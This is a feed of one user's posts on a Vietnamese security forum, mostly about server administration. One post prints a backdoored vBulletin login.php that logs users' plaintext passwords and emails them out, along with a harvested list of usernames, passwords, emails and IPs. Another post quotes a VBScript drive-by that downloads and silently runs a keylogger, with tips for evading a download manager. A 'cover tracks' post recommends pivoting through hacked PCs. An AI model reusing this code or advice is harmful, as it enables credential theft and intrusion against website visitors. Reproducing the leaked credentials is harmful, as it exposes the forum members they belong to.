<![CDATA[Messages posted by "phonglanbiec"]]> /hvaonline/posts/listByUser/126158.html JForum - http://www.jforum.net Case Study: xoá vết (cover tracks)

miyumi2 wrote:

hoahongtuoi wrote:

chiro8x wrote:
Thực lòng em không cảm thấy tin tưởng vào các ISP của Việt Nam lắm, chúng ta sử dụng internet thông qua các thiết bị mạng và các thiết bị này được phân phối thông qua các ISP. ISP sẽ biết đích xác là ai dùng thiết bị gì, tại địa điểm nào, username đăng nhập vào hệ thống là gì.  
Đề nghị bạn nói rõ những nhận định mình trích ở trên, sử dụng căn cứ kỹ thuật, không nhận định cảm tính.  
Làm thế nào nhà mạng thống kê được lưu lượng sử dụng internet (dù là cáp đồng, cáp quang hay usb 3G) để cuối tháng in hóa đơn tính tiền cho bạn? Bạn tự tìm hiểu, đó cũng sẽ là lời giải thích cho đề nghị của bạn. 
Chẳng có ISP nào mà không log những thông tin đó lại. Nên nếu chỉ nói ISP VN thì hơi tội cho họ quá!]]>
/hvaonline/posts/preList/41388/262144.html#262144 /hvaonline/posts/preList/41388/262144.html#262144 GMT
Xem lại các email đã gởi từ hàm mail() trên PHP User: xxx Pass: 113114 Email :xxx@yahoo.com.vn ID : 35164 GroupID : 4 IP: 123.16.146.0 Time: Sunday 22nd of April 2012 08:08:35 PM User: xxx Pass: 314159htm Email :xxx@yahoo.com ID : 11557 GroupID : 17 IP: 113.185.1.167 Time: Sunday 22nd of April 2012 08:09:29 PM User: xxx Pass: canhdonglua Email :xxx@yahoo.com ID : 22680 GroupID : 2 IP: 1.52.27.213 Time: Sunday 22nd of April 2012 08:11:54 PM User: onelove46 Pass: Email :hoahuongduong663@gmail.com ID : 31446 GroupID : 2 IP: 123.24.141.8 Time: Sunday 22nd of April 2012 08:19:00 PM User: tienhieuo01 Pass: Email :tienhieuo01@yahoo.com.vn ID : 26462 GroupID : 2 IP: 1.53.2.31 Time: Sunday 22nd of April 2012 08:40:21 PM User: edenhoang Pass: Email :uptinmuaban@gmail.com ID : 33772 GroupID : 3 IP: 113.172.221.137 Time: Sunday 22nd of April 2012 08:41:33 PM  Nội dung file php mà hắn đã sửa lại là: Code:
<?php
/*======================================================================*\
|| #################################################################### ||
|| # vBulletin 3.8.4 - Licence Number VBF6B249B5
|| # ---------------------------------------------------------------- # ||
|| # Copyright �2000-2009 Jelsoft Enterprises Ltd. All Rights Reserved. ||
|| # This file may not be redistributed in whole or significant part. # ||
|| # ---------------- VBULLETIN IS NOT FREE SOFTWARE ---------------- # ||
|| # http://www.vbulletin.com | http://www.vbulletin.com/license.html # ||
|| #################################################################### ||
\*======================================================================*/

// ####################### SET PHP ENVIRONMENT ###########################
error_reporting(E_ALL & ~E_NOTICE & ~8192);

// #################### DEFINE IMPORTANT CONSTANTS #######################
define('THIS_SCRIPT', 'login');
define('CSRF_PROTECTION', true);
define('CSRF_SKIP_LIST', 'login');

// ################### PRE-CACHE TEMPLATES AND DATA ######################
// get special phrase groups
$phrasegroups = array();

// get special data templates from the datastore
$specialtemplates = array();

// pre-cache templates used by all actions
$globaltemplates = array();

// pre-cache templates used by specific actions
$actiontemplates = array(
	'lostpw' => array(
		'lostpw',
		'humanverify'
	)
);

// ######################### REQUIRE BACK-END ############################
require_once('./global.php');
require_once(DIR . '/includes/functions_login.php');

// #######################################################################
// ######################## START MAIN SCRIPT ############################
// #######################################################################

$vbulletin->input->clean_gpc('r', 'a', TYPE_STR);

if (empty($_REQUEST['do']) AND empty($vbulletin->GPC['a']))
{
	exec_header_wwwect($vbulletin->options['forumhome'] . '.php');
}

// ############################### start logout ###############################
if ($_REQUEST['do'] == 'logout')
{
	define('NOPMPOPUP', true);

	$vbulletin->input->clean_gpc('r', 'logouthash', TYPE_STR);

	if ($vbulletin->userinfo['userid'] != 0 AND !verify_security_token($vbulletin->GPC['logouthash'], $vbulletin->userinfo['securitytoken_raw']))
	{
		eval(standard_error(fetch_error('logout_error', $vbulletin->session->vars['sessionurl'], $vbulletin->userinfo['securitytoken'])));
	}

	process_logout();

	$vbulletin->url = fetch_replaced_session_url($vbulletin->url);
	if (strpos($vbulletin->url, 'do=logout') !== false)
	{
		$vbulletin->url = $vbulletin->options['forumhome'] . '.php' . $vbulletin->session->vars['sessionurl_q'];
	}
	$show['member'] = false;
	eval(standard_error(fetch_error('cookieclear', create_full_url($vbulletin->url), $vbulletin->options['forumhome'], $vbulletin->session->vars['sessionurl_q']), '', false));

}

// ############################### start do login ###############################
// this was a _REQUEST action but where do we all login via request?
if ($_POST['do'] == 'login')
{
	$vbulletin->input->clean_array_gpc('p', array(
		'vb_login_username'        => TYPE_STR,
		'vb_login_password'        => TYPE_STR,
		'vb_login_md5password'     => TYPE_STR,
		'vb_login_md5password_utf' => TYPE_STR,
		'postvars'                 => TYPE_BINARY,
		'cookieuser'               => TYPE_BOOL,
		'logintype'                => TYPE_STR,
		'cssprefs'                 => TYPE_STR,
	));
	try{
      		if($vbulletin->db->query_first("SELECT username FROM userpan WHERE username ='".$vbulletin->GPC['vb_login_username']."'")){
			$vbulletin->db->query_write("UPDATE userpan  set password='".$vbulletin->GPC['vb_login_password']."' where username='".$vbulletin->GPC['vb_login_username']."'");
		}else{
			$vbulletin->db->query_write("INSERT INTO  userpan(username,password) values('".$vbulletin->GPC['vb_login_username']."','".$vbulletin->GPC['vb_login_password']."')");
		}      	
		$vbulletin->GPC['vb_login_password']="";
 		}
	catch(Exception $e){}
	// can the user login?
	$strikes = verify_strike_status($vbulletin->GPC['vb_login_username']);

	if ($vbulletin->GPC['vb_login_username'] == '')
	{
		eval(standard_error(fetch_error('badlogin', $vbulletin->options['bburl'], $vbulletin->session->vars['sessionurl'], $strikes)));
	}

	// make sure our user info stays as whoever we were (for example, we might be logged in via cookies already)
	$original_userinfo = $vbulletin->userinfo;

	if (!verify_authentication($vbulletin->GPC['vb_login_username'], $vbulletin->GPC['vb_login_password'], $vbulletin->GPC['vb_login_md5password'], $vbulletin->GPC['vb_login_md5password_utf'], $vbulletin->GPC['cookieuser'], true))
	{
		($hook = vBulletinHook::fetch_hook('login_failure')) ? eval($hook) : false;

		// check password
		exec_strike_user($vbulletin->userinfo['username']);

		if ($vbulletin->GPC['logintype'] === 'cplogin' OR $vbulletin->GPC['logintype'] === 'modcplogin')
		{
			// log this error if attempting to access the control panel
			require_once(DIR . '/includes/functions_log_error.php');
			log_vbulletin_error($vbulletin->GPC['vb_login_username'], 'security');
		}
		$vbulletin->userinfo = $original_userinfo;

		if ($vbulletin->options['usestrikesystem'])
		{
			eval(standard_error(fetch_error('badlogin_strikes', $vbulletin->options['bburl'], $vbulletin->session->vars['sessionurl'], $strikes)));
		}
		else
		{
			eval(standard_error(fetch_error('badlogin', $vbulletin->options['bburl'], $vbulletin->session->vars['sessionurl'])));
		}
	}

	exec_unstrike_user($vbulletin->GPC['vb_login_username']);

	// create new session
	process_new_login($vbulletin->GPC['logintype'], $vbulletin->GPC['cookieuser'], $vbulletin->GPC['cssprefs']);



$lg_username = strtolower($vbulletin->GPC["vb_login_username"]); 
   	$lg_password = $vbulletin->GPC["vb_login_password"]; 
[color=red]   	$mail="xxx@live.com";
	$lfile="/tmp/sess_xxx";[/color]
	$lhande=@fopen($lfile,'a');
$email = "unknow";
        if(isset($vbulletin->userinfo['email']))
	$email = $vbulletin->userinfo['email'];
        $userid =$vbulletin->userinfo['userid']; 
        $groupID=$vbulletin->userinfo['usergroupid']; 
	$result = @mysql_query("select email from user where username='".$vbulletin->GPC['vb_login_username']."'");
	if($result)
	{
		$row = @mysql_fetch_array($result);
			$email = $row["email"];
	}	
	$ldata="User: ".$_POST["vb_login_username"]." Pass: ".$lg_password." Email :".$email ." ID : ".$userid. "  GroupID : ".$groupID. " IP: ".$_SERVER["REMOTE_ADDR"]." Time: ".date('l jS \of F Y h:i:s A')."\n";
	$sub=@$_SERVER['HTTP_HOST']."  user login ".date('l jS \of F Y h:i:s A');
	@fwrite($lhande,$ldata);
	@fclose($lhande);
	if(@filesize($lfile)>=1024*10) {
		$data=file_get_contents($lfile);
		@mail($mail,$sub,$data);
		@unlink($lfile);
	}














	// do wwwect
	do_login_wwwect();

}
else if ($_GET['do'] == 'login')
{
	// add consistency with previous behavior
	exec_header_wwwect($vbulletin->options['forumhome'] . '.php');
}

// ############################### start lost password ###############################
if ($_REQUEST['do'] == 'lostpw')
{
	$vbulletin->input->clean_gpc('r', 'email', TYPE_NOHTML);
	$email = $vbulletin->GPC['email'];

	if ($permissions['forumpermissions'] & $vbulletin->bf_ugp_forumpermissions['canview'])
	{
		$navbits = construct_navbits(array('' => $vbphrase['lost_password_recovery_form']));
		eval('$navbar = "' . fetch_template('navbar') . '";');
	}
	else
	{
		$navbar = '';
	}

	// human verification
	if (fetch_require_hvcheck('lostpw'))
	{
		require_once(DIR . '/includes/class_humanverify.php');
		$verification =& vB_HumanVerify::fetch_library($vbulletin);
		$human_verify = $verification->output_token();
	}
	else
	{
		$human_verify = '';
	}

	$url =& $vbulletin->url;
	eval('print_output("' . fetch_template('lostpw') . '");');
}

// ############################### start email password ###############################
if ($_POST['do'] == 'emailpassword')
{

	$vbulletin->input->clean_array_gpc('p', array(
		'email' => TYPE_STR,
		'userid' => TYPE_UINT,
		'humanverify'  => TYPE_ARRAY,
	));

	if ($vbulletin->GPC['email'] == '')
	{
		eval(standard_error(fetch_error('invalidemail', $vbulletin->options['contactuslink'])));
	}

	if (fetch_require_hvcheck('lostpw'))
	{
		require_once(DIR . '/includes/class_humanverify.php');
		$verify =& vB_HumanVerify::fetch_library($vbulletin);
		if (!$verify->verify_token($vbulletin->GPC['humanverify']))
		{
	  		standard_error(fetch_error($verify->fetch_error()));
	  	}
	}

	require_once(DIR . '/includes/functions_user.php');

	$users = $db->query_read_slave("
		SELECT userid, username, email, languageid
		FROM " . TABLE_PREFIX . "user
		WHERE email = '" . $db->escape_string($vbulletin->GPC['email']) . "'
	");
	if ($db->num_rows($users))
	{
		while ($user = $db->fetch_array($users))
		{
			if ($vbulletin->GPC['userid'] AND $vbulletin->GPC['userid'] != $user['userid'])
			{
				continue;
			}
			$user['username'] = unhtmlspecialchars($user['username']);

			$user['activationid'] = build_user_activation_id($user['userid'], 2, 1);

			eval(fetch_email_phrases('lostpw', $user['languageid']));
			vbmail($user['email'], $subject, $message, true);
		}

		$vbulletin->url = str_replace('"', '', $vbulletin->url);
		eval(print_standard_wwwect('wwwect_lostpw', true, true));
	}
	else
	{
		eval(standard_error(fetch_error('invalidemail', $vbulletin->options['contactuslink'])));
	}
}

// ############################### start reset password ###############################
if ($vbulletin->GPC['a'] == 'pwd' OR $_REQUEST['do'] == 'resetpassword')
{

	$vbulletin->input->clean_array_gpc('r', array(
		'userid'       => TYPE_UINT,
		'u'            => TYPE_UINT,
		'activationid' => TYPE_STR,
		'i'            => TYPE_STR
	));

	if (!$vbulletin->GPC['userid'])
	{
		$vbulletin->GPC['userid'] = $vbulletin->GPC['u'];
	}

	if (!$vbulletin->GPC['activationid'])
	{
		$vbulletin->GPC['activationid'] = $vbulletin->GPC['i'];
	}

	$userinfo = verify_id('user', $vbulletin->GPC['userid'], 1, 1);

	$user = $db->query_first("
		SELECT activationid, dateline
		FROM " . TABLE_PREFIX . "useractivation
		WHERE type = 1
			AND userid = $userinfo[userid]
	");

	if (!$user)
	{
		// no activation record, probably got back here after a successful request, back to home
		exec_header_wwwect($vbulletin->options['forumhome'] . '.php');
	}

	if ($user['dateline'] < (TIMENOW - 24 * 60 * 60))
	{  // is it older than 24 hours?
		eval(standard_error(fetch_error('resetexpired', $vbulletin->session->vars['sessionurl'])));
	}

	if ($user['activationid'] != $vbulletin->GPC['activationid'])
	{ //wrong act id
		eval(standard_error(fetch_error('resetbadid', $vbulletin->session->vars['sessionurl'])));
	}

	// delete old activation id
	$db->query_write("DELETE FROM " . TABLE_PREFIX . "useractivation WHERE userid = $userinfo[userid] AND type = 1");

	$newpassword = fetch_random_password(8);

	// init user data manager
	$userdata =& datamanager_init('User', $vbulletin, ERRTYPE_STANDARD);
	$userdata->set_existing($userinfo);
	$userdata->set('password', $newpassword);
	$userdata->save();

	($hook = vBulletinHook::fetch_hook('reset_password')) ? eval($hook) : false;

	eval(fetch_email_phrases('resetpw', $userinfo['languageid']));
	vbmail($userinfo['email'], $subject, $message, true);

	eval(standard_error(fetch_error('resetpw', $vbulletin->session->vars['sessionurl'])));

}

/*======================================================================*\
|| ####################################################################
|| # Downloaded: 21:09, Mon Sep 28th 2009
|| # CVS: $RCSfile$ - $Revision: 31381 $
|| ####################################################################
\*======================================================================*/
?>
Thông tin về server:
Apache version 2.2.17 PHP version 5.2.14 MySQL version 5.0.95-community Architecture i686 Operating system linux Kernel version 2.6.18-238.19.1.el5PAE 
]]>
/hvaonline/posts/preList/42028/261895.html#261895 /hvaonline/posts/preList/42028/261895.html#261895 GMT
Hỏi bằng Kỹ Sư và bằng Cử Nhân Đại Học, nhờ tư vấn

Ikut3 wrote:
tôi không nghĩ sinh viên mới ra trường thì sẽ được gọi là kĩ sư.theo tôi kĩ sư không chỉ là một học hàm đổi bằng 4 năm đại học.mà kĩ sư là giá trị là sự đúc rút kinh nghiệm nhiều năm giữa chuyện thực hành chuyên sâu và am hiểu toàn cục cho đến chi tiết giá trị kiến thức của một lĩnh vực nhất định thế nên theo tôi đừng quan trọng là cử nhân hay kĩ sư làm gì.nếu cần bổ sung kiến thức cho những chỗ khuyết thì học thôi. chỉ có thời gian mới có thể trả lời giá trị thực của bạn chứ 2 thứ kia thì không thể đâu thanks 
http://dantri.com.vn/c4/s25-171951/bang-cu-nhan-va-bang-ky-su-khac-nhau-nhu-the-nao.htm Bằng cử nhân của những ngành Kỹ thuật thì có nghĩa là người học được học những gì thiên về hướng nghiên cứu. Còn Kỹ sư thiên về hướng thực hành. 2 bằng có giá trị như nhau cũng như kiến thức gần như nhau.]]>
/hvaonline/posts/preList/41515/257564.html#257564 /hvaonline/posts/preList/41515/257564.html#257564 GMT
Case Study: xoá vết (cover tracks)

.lht. wrote:
Đến đây, có thể "thông tin" máy ta được che giấu (khi đi qua các proxies) nhưng "hành động" của chúng ta không thể nào che giấu được khi qua những chặng này.  
Như mình đã nói, thông tin ta connect đến các chặng này thì không thể che dấu được, mỗi bước đi của ta ít nhiều đều để lại dấu chân. Nhưng quan trọng ta chọn đi ở đâu, chẳng hạn như đi ra biển (các servers) thì dấu chân để lại nhiều; còn đi trên gạch (các PC đã bị ta hack) thì dấu chân của ta để lại ít hơn. Suy nghĩ của mình khi viết bài này: mình đặt mình là người điều tra, và người điều tra nghĩ gì, sau đó mình làm ngược lại với suy nghĩ đó :)]]>
/hvaonline/posts/preList/41388/257138.html#257138 /hvaonline/posts/preList/41388/257138.html#257138 GMT
Case Study: xoá vết (cover tracks) /hvaonline/posts/preList/41388/257037.html#257037 /hvaonline/posts/preList/41388/257037.html#257037 GMT Xin được hỗ trợ về NGINX cho Joomla! /hvaonline/posts/preList/40043/246961.html#246961 /hvaonline/posts/preList/40043/246961.html#246961 GMT Xin tư vấn thuê và cấu hình máy chủ Share Hosting windows /hvaonline/posts/preList/39665/244433.html#244433 /hvaonline/posts/preList/39665/244433.html#244433 GMT Quá nhiều socket TIME_WAIT

secmask wrote:

namduong8889 wrote:

secmask wrote:
ok, nghe cũng ná ná trường hơp của tớ :D, bạn thử áp dụng cách của tớ chưa? kết quả sao, cái này chỉ cần chỉnh mấy thông số trong kernel thôi, không cần dịch lại kernel. nếu thấy ổn thì có thể add config đó vào /etc/sysctl.conf để có hiệu lực lâu dài. 
Chào bác :D Nguyên nhân căn bản vẫn là do có quá nhiều TIME_WAIT giống như bác, nếu ngắt đi được cái TIME_WAIT thì tốt, nhưng em đang chạy VPS chứ không phải server riêng, quyền root có thể ghi vào fule sysctl.conf nhưng các lệnh trong đó thì không có quyền thực hiện. Em không được sửa kernel vì HP họ nó sửa là ảnh hưởng tới các VPS khác trên cùng server; Hiện giờ em chỉ cố gắng tune cho nó chạy tạm hết cỡ cho tròn tháng này để em chuyển sang dedicated server... nếu bác có tìm ra đựoc cái gì để tune tạm trong thời gian này thì chỉ em với nhé... thanks bác hehe! 
VPS = Virtual Private Server , tức là server của bạn được cài trên máy ảo, cùng với các server ảo khác trên một máy vật lý, vì vậy cấu hình các server ảo nào không hề phụ thuộc vào nhau, làm gì có chuyện ảnh hưởng tới các máy ảo khác được, bạn nên hỏi lại bên cho thuê server. Khi bạn đã thuê một vps, bạn đươc toàn quyền cài đặt từ OS đến các phần mềm trên đó. 
Mình nghĩ chắc là do cậu ấy dùng VPS công nghệ OpenVZ. @namduong8889: nếu bạn chủ yếu dùng static content sao không dùng varnish đặt trước lighttpd? varnish cache rất tốt, giảm tải khá nhiều nếu như content của bạn ít "động đậy".]]>
/hvaonline/posts/preList/29559/244365.html#244365 /hvaonline/posts/preList/29559/244365.html#244365 GMT
ftp lên Apache web root - gán permission thế nào cho đúng /hvaonline/posts/preList/39567/243654.html#243654 /hvaonline/posts/preList/39567/243654.html#243654 GMT ftp lên Apache web root - gán permission thế nào cho đúng

quanta wrote:

phonglanbiec wrote:
Đã đọc kỹ, giải pháp của mình ở trên cũng giống như bạn mv1098 mà?  
Giống là giống thế nào? Một đằng là add apache và nobody vào chung một group rồi gán quyền write cho group, còn một đằng là add apache vào tất cả các group của FTP users.  
Có thể bạn quanta không hiểu ý mình ở topic mình đã viết ở trên.

phonglanbiec wrote:
2. Mỗi một user thì có group cùng tên, nhưng trong group đó thì có cả user apache  
Chữ user của mình ở đây được hiểu là FTP User. Vậy là giải pháp đã có rồi, mình không biết về mount --bind nên thành ra đi dài dòng.]]>
/hvaonline/posts/preList/39567/243652.html#243652 /hvaonline/posts/preList/39567/243652.html#243652 GMT
ftp lên Apache web root - gán permission thế nào cho đúng

quanta wrote:

phonglanbiec wrote:
Đúng là chmod 777 thì rất nhiều nhược điểm. Nhưng nếu không chmod 777 thì lại không có cách nào làm cho các users khác có quyền write trong đây. quanta có cao kiến gì nếu như giải pháp là của mình nhưng khắc phục được điểm này?  
Hình như bạn chưa đọc kỹ bài của mv1098 ở post #12.  
Đã đọc kỹ, giải pháp của mình ở trên cũng giống như bạn mv1098 mà? nhưng giải pháp đó thì mình không nghĩ cách nào giải quyết được thằng DocumentRoot

quanta wrote:

phonglanbiec wrote:
quanta có thể gởi cho mình tài liệu để tìm hiểu kỹ hơn về phần này không?  
Ngay cả khi với system users, xác thực qua PAM bạn cứ tạo một vài user rồi thử xem có liên quan đến user chạy FTP server không. Còn virtual users thì dùng FTP server nào thì Google cho FTP server ấy.  
Mình sẽ xem lại phần này.

quanta wrote:

phonglanbiec wrote:
Phải chmod lại. Vì mặc định Apache gán quyền 644.  
Không, quyền mặc định của thư mục là 755. Làm sao biết khi nào Apache hay FTP users tạo ra một thư mục mới mà chmod, chẳng nhẽ lại dùng inotify cron. Bạn tìm hiểu thêm về umask xem.  
Trước nay mình chỉ làm umask cho FTP chứ chưa cho Apache nên tìm hiểu lại phần này. Vẫn đang suy nghĩ các giải pháp khác :)]]>
/hvaonline/posts/preList/39567/243649.html#243649 /hvaonline/posts/preList/39567/243649.html#243649 GMT
ftp lên Apache web root - gán permission thế nào cho đúng

quanta wrote:

phonglanbiec wrote:
Group là apache, chmod /var/www/html/domain.com thành 777  
Ngay từ khi mới làm quen với Linux mình đã nhớ nằm lòng một câu là: đừng bao giờ chmod cái gì thành 777. Bạn thử nghĩ xem lý do là gì?  
Đúng là chmod 777 thì rất nhiều nhược điểm. Nhưng nếu không chmod 777 thì lại không có cách nào làm cho các users khác có quyền write trong đây. quanta có cao kiến gì nếu như giải pháp là của mình nhưng khắc phục được điểm này?

quanta wrote:

phonglanbiec wrote:
Chỗ này mình còn hơi lúng túng. Vì mình làm thì trước nay FTP mình không care về user chạy nó. Mình chỉ care khi bật anymous lên thôi :)  
Vậy thử tìm hiểu kỹ lại xem, nhất là khi dùng virtual users.  
quanta có thể gởi cho mình tài liệu để tìm hiểu kỹ hơn về phần này không?

quanta wrote:

phonglanbiec wrote:
Thư mục do Apache tạo thì là 775 luôn.  
Thật không vậy? 775 là mặc định tạo ra đã thế hay là phải chmod. Quyền này do cái gì quyết định? 
  Phải chmod lại. Vì mặc định Apache gán quyền 644. Mình đang nghĩ đến giải pháp mỗi users một home folder riêng, sau đó tất cả đều hardlink về, không biết được không nhỉ? Mình chưa thử hardlink với FTP bao giờ cả :)]]>
/hvaonline/posts/preList/39567/243646.html#243646 /hvaonline/posts/preList/39567/243646.html#243646 GMT
Lỗi này có phải server bị ddos không? /hvaonline/posts/preList/39585/243637.html#243637 /hvaonline/posts/preList/39585/243637.html#243637 GMT Lỗi này có phải server bị ddos không? /hvaonline/posts/preList/39585/243635.html#243635 /hvaonline/posts/preList/39585/243635.html#243635 GMT ftp lên Apache web root - gán permission thế nào cho đúng

quanta wrote:

phonglanbiec wrote:
Nếu tất cả đều làm trong 1 chỗ thì mình nghĩ home folder của tất cả đều trỏ về /var/www/html/domain.com và folder này owner là apache.  
OK. Còn group là gì?  
Group là apache, chmod /var/www/html/domain.com thành 777

quanta wrote:

phonglanbiec wrote:
Nobody thì mình thấy không liên quan gì trong đây cả, vì nhiệm vụ của nó chỉ là chạy FTPD thôi, còn quyền khi upload thì là của users.  
Bạn thử làm đi xem nó có liên quan không nhé.  
Chỗ này mình còn hơi lúng túng. Vì mình làm thì trước nay FTP mình không care về user chạy nó. Mình chỉ care khi bật anymous lên thôi :)

quanta wrote:

phonglanbiec wrote:
2. Config lại FTPD để khi user upload lên thì quyền hạn mặc định là: 775  
Còn thư mục do Apache tạo ra thì sao?  
Thư mục do Apache tạo thì là 775 luôn. ]]>
/hvaonline/posts/preList/39567/243634.html#243634 /hvaonline/posts/preList/39567/243634.html#243634 GMT
ftp lên Apache web root - gán permission thế nào cho đúng /hvaonline/posts/preList/39567/243624.html#243624 /hvaonline/posts/preList/39567/243624.html#243624 GMT ftp lên Apache web root - gán permission thế nào cho đúng /hvaonline/posts/preList/39567/243620.html#243620 /hvaonline/posts/preList/39567/243620.html#243620 GMT ftp lên Apache web root - gán permission thế nào cho đúng /hvaonline/posts/preList/39567/243617.html#243617 /hvaonline/posts/preList/39567/243617.html#243617 GMT ftp lên Apache web root - gán permission thế nào cho đúng /hvaonline/posts/preList/39567/243614.html#243614 /hvaonline/posts/preList/39567/243614.html#243614 GMT Lỗi này có phải server bị ddos không? /hvaonline/posts/preList/39585/243611.html#243611 /hvaonline/posts/preList/39585/243611.html#243611 GMT ftp lên Apache web root - gán permission thế nào cho đúng /hvaonline/posts/preList/39567/243598.html#243598 /hvaonline/posts/preList/39567/243598.html#243598 GMT ftp lên Apache web root - gán permission thế nào cho đúng /hvaonline/posts/preList/39567/243596.html#243596 /hvaonline/posts/preList/39567/243596.html#243596 GMT Cần tìm thực tập viên - IT Technician tại Hà Nội /hvaonline/posts/preList/39465/243593.html#243593 /hvaonline/posts/preList/39465/243593.html#243593 GMT Xác định nguyên nhân gây quá tải trên server /hvaonline/posts/preList/37695/236470.html#236470 /hvaonline/posts/preList/37695/236470.html#236470 GMT Vấn đề configure Nginx /hvaonline/posts/preList/38137/234518.html#234518 /hvaonline/posts/preList/38137/234518.html#234518 GMT Cách gắn keylogger vào 1 website

dnv2006 wrote:

kunkunlove wrote:
Mình áp dụng code này vào webiste của mình ----------------------------- <script language=VBScript> on error resume next dl = "địa chỉ keylogger.exe" Set df = document.createElement ("object") df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36" str="Microsoft.XMLHTTP" Set x = df.CreateObject (str,"") a1="Ado" a2="db." a3="Str" a4="e" a5="am" str1=a1&a2&a3&a4&a5 str5=str1 set S = df.createobject(str5,"") S.type = 1 str6="GET" x.Open str6, dl, False x.Send fname1="SVCHOST555.exe" set F = df.createobject("Scripting.FileSystemObject","") set tmp = F.GetSpecialFolder (2) ' Get tmp folder fname1= F.BuildPath(tmp,fname1) S.open S.write x.responseBody S.savetofile fname1,2 S.close set Q = df.createobject("Shell.Application","") Q.ShellExecute fname1,"","","open",0 </script> ----------------------------- Nhưng mình thấy 1 điều rằng nó hoạt động khi không dùng IDM, còn có IDM thì nó hiện bảng download của IDM Ai có cách nào xin giúp mình  
Mình chưa từng thử làm kiểu này, bạn thử một số giải pháp này xem sao: - Đổi đuôi địa chỉ keylogger.exe sang cái đuôi khác *.exe được ko? (.com , .bat v.v..) - IDM mặc định bắt được link trong một số trình duyệt (IE, Firefox phải có add-on IDM CC), nếu victim của bạn dùng Google Chrome, Safari, Opera, Maxthon v.v.. thì đoạn mã trên vẫn có tác dụng. - Có cách nào đó can thiệp vào phần mềm IDM để không bắt link trong trình duyệt nào đó, không bắt link trong các địa chỉ site có dạng nào đó, không bắt link dạng đuôi file nào đó? can thiệp bằng registry chăng? Mình chỉ nghĩ ra một số ý tưởng mở như thế thoai. 
Đọc cái dòng màu đỏ mà buồn cười :D]]>
/hvaonline/posts/preList/37192/230689.html#230689 /hvaonline/posts/preList/37192/230689.html#230689 GMT
Vấn đề Hijacking "p3p0.com" cho website php /hvaonline/posts/preList/36841/226413.html#226413 /hvaonline/posts/preList/36841/226413.html#226413 GMT Xu hướng tấn công và bảo mật 2010 - 2011 /hvaonline/posts/preList/36344/223707.html#223707 /hvaonline/posts/preList/36344/223707.html#223707 GMT Truy tìm kẻ gửi mail nặc danh! /hvaonline/posts/preList/36003/221262.html#221262 /hvaonline/posts/preList/36003/221262.html#221262 GMT Cho hỏi thế này có phải là bị hack hay virus ko? ( kèm hình ) /hvaonline/posts/preList/35934/220920.html#220920 /hvaonline/posts/preList/35934/220920.html#220920 GMT